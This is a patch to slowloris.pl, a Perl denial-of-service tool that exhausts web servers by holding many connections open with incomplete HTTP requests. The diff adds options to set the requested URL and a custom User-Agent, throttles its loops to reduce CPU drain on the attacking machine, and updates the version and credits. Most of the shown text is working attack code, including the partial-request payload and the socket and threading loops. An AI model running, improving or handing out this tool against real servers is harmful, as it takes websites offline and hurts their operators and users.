# References:
# http://wiki.apache.org/httpd/DoS
# http://ha.ckers.org/slowloris/
--- slowloris.pl.orig 2009-06-17 00:00:00.000000000 +0200
+++ slowloris.pl 2011-04-29 00:00:00.000000000 +0200
@@ -38,10 +38,14 @@
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
+my $url = "/";
+my $agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12; SlowLoris Patched)";
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
+ 'agent=s' => \$agent,
+ 'url=s' => \$url,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
@@ -55,7 +59,7 @@
);
if ($version) {
- print "Version 0.7\n";
+ print "Version 0.7p2\n";
exit;
}
@@ -164,9 +168,9 @@
$rand = "";
}
my $primarypayload =
- "GET /$rand HTTP/1.1\r\n"
+ "GET $url$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
- . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
+ . "User-Agent: $agent\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
@@ -241,6 +245,7 @@
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
+ #select(undef, undef, undef, 0.1);
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
@@ -283,9 +288,9 @@
$rand = "";
}
my $primarypayload =
- "$method /$rand HTTP/1.1\r\n"
+ "$method $url$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
- . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
+ . "User-Agent: $agent\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
@@ -316,6 +321,7 @@
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
+ #select(undef, undef, undef, 0.1);
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
@@ -350,6 +356,7 @@
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
+ #select(undef, undef, undef, 0.1);
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
@@ -357,6 +364,7 @@
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
+ select(undef, undef, undef, 0.1); # reduce CPU drain
}
}
@@ -368,15 +376,15 @@
=head1 VERSION
-Version 0.7 Beta
+Version 0.7p2 Beta
=head1 DATE
-06/17/2009
+06/17/2009, 29.Apr.2011
=head1 AUTHOR
-RSnake <h@ckers.org> with threading from John Kinsella
+RSnake <h@ckers.org> with threading from John Kinsella and patch to reduce CPU drain from Guillermo Grandes
=head1 ABSTRACT
END